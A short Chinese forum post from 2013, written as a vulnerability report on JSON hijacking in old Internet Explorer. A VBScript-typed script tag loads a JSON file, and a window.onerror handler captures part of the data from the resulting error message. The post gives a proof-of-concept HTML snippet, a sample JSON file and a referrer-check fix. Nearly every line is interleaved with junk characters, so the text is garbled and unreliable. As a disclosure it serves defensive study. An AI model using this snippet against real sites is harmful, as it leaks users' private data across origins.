简要描述:
4 Z1 ?4 [$ u4 I1 Q6 }$ t3 j, U1 {) ?* V( x
由于某些资源容器对数据处理不当导致json劫持漏洞.
5 {" y8 a+ F! l; z5 F4 X3 w详细说明:/ E1 R! \( ]% i& c; _
由于ie支持vbscript,所以script元素可以指定成vbscript语言:
+ ~1 u6 Z2 \+ d6 B$ I<script language=vbscript></script>
4 z5 _1 c% ?2 r5 z7 z+ l f 1 s" v, a/ S! n* m. I; l; x
当但我们指定的是一个js格式的文件是将会发现一个异常,这使我们通过捕获这个异常的信息来获得部分json数据.
$ r9 T, T9 ]* {, h& I5 Y3 M; H漏洞证明:, J9 q1 k6 w7 c+ P) I' |# g
<script>& i% o" W! ~9 p7 P
window.onerror=function(_){* ~5 ]* v5 P1 M- R
alert(_)) Z$ }* {' m8 k
}* b6 [ r. e8 F6 _4 V# S1 i5 j; F
</script>
3 U1 {& b8 p( |1 k3 v4 K<script language=vbscript src=1.json></script>
* A. A) i) i1 e 8 a+ z6 W8 T. [; i1 S" Q, i
8 C; @: Y2 }9 |: f/ o; o( S3 G
1.json:6 o, D3 R# B" D) T; b* A$ k
[{"name":"sogili","age":19}]
4 b7 @1 H" \2 D6 Z) X* U+ ]修复方案:
1 }: U& e" j) L! m m" `2 y! |, L网站业务对于这个问题可以通过验证referrer是否为同源来防御 |
发表于 2013-2-23 11:33:57
收藏
支持
反对